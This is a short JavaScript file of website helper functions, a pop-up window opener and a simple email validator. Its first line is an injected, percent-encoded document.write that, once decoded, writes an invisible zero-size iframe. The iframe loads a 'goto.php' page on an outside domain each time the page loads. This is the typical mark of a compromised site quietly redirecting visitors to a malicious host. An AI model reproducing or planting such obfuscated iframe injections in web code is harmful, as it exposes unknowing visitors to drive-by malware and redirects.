document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%73%2e%76%69%74%61%6d%69%6e%73%6c%69%76%65%2e%63%6f%6d%2f%67%6f%74%6f%2e%70%68%70%27%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e"));
function pop_up_window(sTarget,sTitle,sWidth,sHeight,sResize,sScroll) {
	wPopUp = window.open(sTarget, sTitle, 'width=' + sWidth + ',height=' + sHeight + ',resizeable=' + sResize + ',scrollbars=yes');
	wPopUp.focus()
}

function validate_email(str) {
	l = str.length;
	at=str.indexOf("@");
	lastdot = str.lastIndexOf(".");
	if (at < 1 || (lastdot > l-3) || (lastdot-at < 2)) 
	return false;
}

